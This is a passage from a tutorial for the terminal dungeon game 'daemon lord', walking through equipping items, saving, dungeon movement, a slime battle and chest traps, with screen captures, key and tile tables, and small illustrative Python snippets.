(nothing)\n\nBasically, the front (ie, the first three) members should equip heavily because monsters mostly aim at front members when physically attack. Short-range wepons can't be used by the 4th to 6th members.\n\nsling is a long-range weapon that everyone can use. You can't expect much from sling and its damage is at best 1 or 2, but better than nothing. Long-ranged weapons tend to be less powerful and more expensive than short-range ones.\n\n\n<a id=\"org3c59398\"></a>\n\n### Equip\n\nYou can equip items at Hawthorne Tavern or while camping in the dungeon. 
Let's go to Hawthorne Tavern.\n\nAt Hatthorne Tavern, first `i)nspect` a character and then choose `i)tems` > item number > `e)quip` .\n\n daemon lord - dl - [hawthorne_tavern] floor:?? (???/???) \n \n | ab| * which item? # or l)leave | | \n | | 2) chain mail | | \n | st| u)se e)quip t)rade d)rop l)eave > | 1 | \n | | | 0 | \n | | |10 | \n | vi| | | \n | a| | | \n | | | | \n | | \n | mage 0/0/0/0/0/0/0 priest 0/0/0/0/0/0/0/ | \n | 1) *long sword 2) chain mail | \n | 3) large shield 4) | \n | 5) 6) | \n | 7) 8) |\n\nEquipped items will have `*` mark next to the item name. You need to equip one item at a time and for each member. To change members, type `j, k` .\n\n\n<a id=\"orgd334654\"></a>\n\n## Save and Resume\n\nTo save and quit the game, go to Edge of Town and type `S` (capital-S).\n\n | * *** Edge of Town *** | \n | m)aze | \n | t)raining grounds | \n | c)astle | \n | S)ave and quit game | \n | R)esume from saved data | \n | Command? > S | \n | * Thank you for playing. | \n | * See you soon. | \n\nYou need to run `python dl.py` again to restart and resume the game. After restarting the game, go to Edge of Town and choose `R)esume from saved data` . That is, capital-R. Automatic resume is not supported.\n\n\n<a id=\"org8f46950\"></a>\n\n## Dungeon\n\nNow, you are ready for the Dungeon. At Edge of Town, choose `m)aze` and voila!\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^.@.^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^ ^\n 1 ab G-FIG 4 13 OK ^ ^\n 2 ben G-FIG 4 12 OK ^ ^\n 3 cam G-FIG 4 10 OK ^ ^\n 4 dia N-THI 10 7 OK ^ ^\n 5 emily G-PRI 10 13 OK ^ ^\n 6 faun G-MAG 10 7 OK ^ ^\n\nCongratulations!\nYou (`@`) are now in the dungeon and on the upstairs to the outside world.\n`^` indicates areas that you have not visited yet. `.` is a floor tile that you can walk on. \n\n\n<a id=\"org56d6bb2\"></a>\n\n### Walk around the Dungeon\n\nThe dungeon is a little dark and only 3x3 tiles around you are visible. Let's move around a little with `h, j, k, l` keys. 
The key bindings should be familiar to those who use vi/vim and have played rogue-like games.\n\nThe party (`@`) is always shown in the center of the map scroll window.\n\nHere's the key operations on dungeon maps\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">key</th>\n<th scope=\"col\" class=\"org-left\">action</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">h</td>\n<td class=\"org-left\">move left (west)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">j</td>\n<td class=\"org-left\">move up (north)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">k</td>\n<td class=\"org-left\">move down (south)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">l</td>\n<td class=\"org-left\">move right (east)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">c</td>\n<td class=\"org-left\">camp menu</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">o + direction</td>\n<td class=\"org-left\">(unlock and) open door</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">.</td>\n<td class=\"org-left\">stay/stomp?</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">S</td>\n<td class=\"org-left\">save</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">Q</td>\n<td class=\"org-left\">Quit game w/o saving</td>\n</tr>\n</tbody>\n</table>\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....@#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nYou can now see inside a 5x4 room. `<` is upstairs. `#` is a stone wall or a rock. `+` is a door. 
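One correction worth noting: the key table above lists `j` as north and `k` as south, but the maze code (and the transcripts later in this tour) follow the vi convention — `k` decrements `party.y` (north) and `j` increments it (south). The deltas as the handler actually applies them:

```python
# Movement deltas per maze()'s key handler; y grows downward (south).
MOVES = {
    'h': (-1, 0),  # west
    'j': (0, +1),  # south
    'k': (0, -1),  # north
    'l': (+1, 0),  # east
}

def step(x, y, key):
    """New (x, y) after a movement key."""
    dx, dy = MOVES[key]
    return x + dx, y + dy

print(step(5, 5, 'k'))  # (5, 4) — one tile north
```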
Let's move next to a door and type `o` for open, then a direction, in this case `k` for north.\n\nHere's the map tile table for your convenience.\n\n<table border="2" cellspacing="0" cellpadding="6" rules="groups" frame="hsides">\n\n\n<colgroup>\n<col class="org-left" />\n\n<col class="org-left" />\n</colgroup>\n<thead>\n<tr>\n<th scope="col" class="org-left">tile</th>\n<th scope="col" class="org-left">description</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class="org-left">`.`</td>\n<td class="org-left">floor tile you can walk on</td>\n</tr>\n\n\n<tr>\n<td class="org-left">`^`</td>\n<td class="org-left">unknown area (not visited yet)</td>\n</tr>\n\n\n<tr>\n<td class="org-left">`#`</td>\n<td class="org-left">stone wall/rock</td>\n</tr>\n\n\n<tr>\n<td class="org-left">`<`</td>\n<td class="org-left">upstairs</td>\n</tr>\n\n\n<tr>\n<td class="org-left">`>`</td>\n<td class="org-left">downstairs</td>\n</tr>\n\n\n<tr>\n<td class="org-left">`+`</td>\n<td class="org-left">door (need to open)</td>\n</tr>\n\n\n<tr>\n<td class="org-left">`*`</td>\n<td class="org-left">locked door</td>\n</tr>\n\n\n<tr>\n<td class="org-left">`%`</td>\n<td class="org-left">locked door (need special key)</td>\n</tr>\n\n\n<tr>\n<td class="org-left">`,`</td>\n<td class="org-left">message or event</td>\n</tr>\n</tbody>\n</table>\n\nFor locked doors (`*`), you can keep trying to unlock them until you succeed. Your party needs a thief or a ninja for that. A low-level thief might find it difficult to unlock a locked door.\n\nFor special locked doors (`%`), you first need to find the key. Hint: The key should be somewhere on the same floor. Look for an event tile (`,`).\n\nNote that there's no elevator/lift in the dungeon. Use the "tsubasa" spell instead.\n\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..@..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n   # name       class   ac   hp status ^* north                               ^\n   1 ab         G-FIG    4   13 OK      ^* north                              ^\n   2 ben        G-FIG    4   12 OK      ^* north                              ^\n   3 cam        G-FIG    4   10 OK      ^* west                               ^\n   4 dia        N-THI   10    7 OK      ^* west                               ^\n   5 emily      G-PRI   10   13 OK      ^  Which direction? - ;)leave > k     ^\n   6 faun       G-MAG   10    7 OK      ^* Opened.                            ^\n\nOops, another door. 
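\n\nIn map terms, opening a plain door just turns the `+` tile into a walkable one. A minimal hypothetical sketch of that step (not dl's actual code; locked `*`/`%` doors and thief skill checks are omitted):\n\n    # Hypothetical sketch: o)pen plus a direction turns a door into floor.\n    DIRECTIONS = {'h': (-1, 0), 'j': (0, 1), 'k': (0, -1), 'l': (1, 0)}\n\n    def open_door(x, y, direction_key, floor_map):\n        dx, dy = DIRECTIONS[direction_key]\n        tx, ty = x + dx, y + dy\n        if floor_map[ty][tx] == '+':   # plain doors always open\n            floor_map[ty][tx] = '.'\n            return 'Opened.'\n        return 'There is no door there.'\n\n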
Let's open again.\n\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#+#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###@###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n<a id="org9440384"></a>\n\n### Battle\n\nContinue to walk around &#x2026; and, !? See `*** encounter ***` in the message window at the bottom right?\n\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#####+#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....@....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.#######^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n   # name       class   ac   hp status ^* east                                ^\n   1 ab         G-FIG    4   13 OK      ^* east                               ^\n   2 ben        G-FIG    4   12 OK      ^* north                              ^\n   3 cam        G-FIG    4   10 OK      ^* west                               ^\n   4 dia        N-THI   10    7 OK      ^* west                               ^\n   5 emily      G-PRI   10   13 OK      ^* west                               ^\n   6 faun       G-MAG   10    7 OK      ^* *** encounter ***                  ^\n\nYou encountered a group of blue slimes! Two new windows will open for a battle. The upper one is the monster list window. The lower one is the battle message window.\n\n    daemon lord - dl - [battle] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| 1) 3 blue slimes (3)                           |^^^^^^^^^^^^^\n ^^^^^^^^^|                                                |^^^^^^^^^^^^^\n ^^^^^^^^^|                                                |^^^^^^^^^^^^^\n ^^^^^^^^^|                                                |^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| * You encountered slimes.                      |^^^^^^^^^^^^^\n ^^^^^^^^^| * Options - f)ight s)pell                      |^^^^^^^^^^^^^\n ^^^^^^^^^|   u)se p)arry r)un t)ake back                  |^^^^^^^^^^^^^\n ^^^^^^^^^| ab's action? > k                               |^^^^^^^^^^^^^\n ^^^^^^^^^| ab's action? > f                               |^^^^^^^^^^^^^\n ^^^^^^^^^| ben's action? > f                              |^^^^^^^^^^^^^\n ^^^^^^^^^| cam's action? > f                              |^^^^^^^^^^^^^\n ^^^^^^^^^| dia's action? > f                              |^^^^^^^^^^^^^\n ^^^^^^^^^| emily's action? > f                            |^^^^^^^^^^^^^\n ^^^^^^^^^| faun's action? > s                             |^^^^^^^^^^^^^\n ^^^^^^^^^| * What spell to cast?                          |^^^^^^^^^^^^^\n ^^^^^^^^^| > shunmin                                      |^^^^^^^^^^^^^\n ^^^^^^^^^| * Press any key or t)ake back >                |^^^^^^^^^^^^^\n\nFive members will fight, and Faun the mage will cast the "shunmin" (spring sleep) spell, which puts a group of enemies to sleep.\n\n    daemon lord - dl - [battle] floor:?? (???/???) 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| 1) 2 blue slimes (1) |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| * Press any key or t)ake back > |^^^^^^^^^^^^^\n ^^^^^^^^^| * dia swings violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 2 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| * faun casted shunmin. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is not slept. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is not slept. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is slept. |^^^^^^^^^^^^^\n ^^^^^^^^^| * cam thrusts violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 1 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is killed. |^^^^^^^^^^^^^\n\nEverybody is fighting. Umm, \"shunmin\" put only one out of three slimes to sleep. shunmin is more effective against animal or human type monsters.\n\nCam killed one of them. Notice `1) 2 blue slimes (1)` ? Because 1 out of 2 is asleep.\n\n ^^^^^^^^^| times for 1 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is killed. |^^^^^^^^^^^^^\n ^^^^^^^^^| * ben slashes violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 6 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is killed. |^^^^^^^^^^^^^\n ^^^^^^^^^| * emily swings violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 2 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| * ab slashes violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 6 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is killed. |^^^^^^^^^^^^^\n\nThe party killed all three slimes.\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#####+#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#......@..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.#######^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^* south ^\n 1 ab G-FIG 4 13 OK ^* east ^\n 2 ben G-FIG 4 12 OK ^* east ^\n 3 cam G-FIG 4 10 OK ^* east ^\n 4 dia N-THI 10 7 OK ^* *** encounter *** ^\n 5 emily G-PRI 10 13 OK ^ Each survivor gets 27 e.p. ^\n 6 faun G-MAG 10 7 OK ^ Each survivor gets 9 gold. ^\n\nYeah! 
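\n\nAs the message window shows, battle rewards are split evenly among the surviving members. A minimal sketch of that bookkeeping (hypothetical names, not dl's actual code):\n\n    # Hypothetical sketch: divide battle e.p. and gold among survivors.\n    def share_rewards(total_exp, total_gold, party):\n        survivors = [m for m in party if m.status == 'OK']\n        for member in survivors:\n            member.exp += total_exp // len(survivors)\n            member.gold += total_gold // len(survivors)\n\n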
Each survivor received 27 experience points and 9 gold from this battle.\n\n\n<a id="orgc02a53d"></a>\n\n### Chest\n\nSometimes, you encounter a monster party on entering a room. They are room guardians.\n\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^####.^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^.@.^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....######.#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^..<........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....########^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n   # name       class   ac   hp status ^* north                               ^\n   1 ab         G-FIG    4   13 OK      ^* *** encounter ***                  ^\n   2 ben        G-FIG    4   12 OK      ^                                     ^\n\nAnd after you defeat the room guardians, you may find a chest.\n\n    daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * A chest!                              |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * o)pen k)antei i)nspect d)isarm        |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^|   l)eave alone                          |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Option?  >                              |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^|                                         |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^|                                         |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^|                                         |^^^^^^^^^^^^^^^^^^^^^^\n\nChests are usually protected with traps. You first need to identify the trap and then disarm it before opening the chest. This is when a thief is quite useful.\n\nYou have a few options.\n\n- `o)pen` without disarming the trap.\n- `k)antei` use the "kantei" spell to identify the trap\n- `i)nspect` the trap. It might activate the trap\n- `d)isarm` the trap. You need to type the trap name\n- `l)eave alone` Give up the chest and walk away\n\nIf your party has a thief, `i)nspect` and then `d)isarm` the trap; that is usually sufficient. If the floor is 1 or 2 deep, you can just walk away from chests, as you won't find good stuff in them on shallow floors.\n\n ^^^^^^^^^^^^^^| * A chest!                              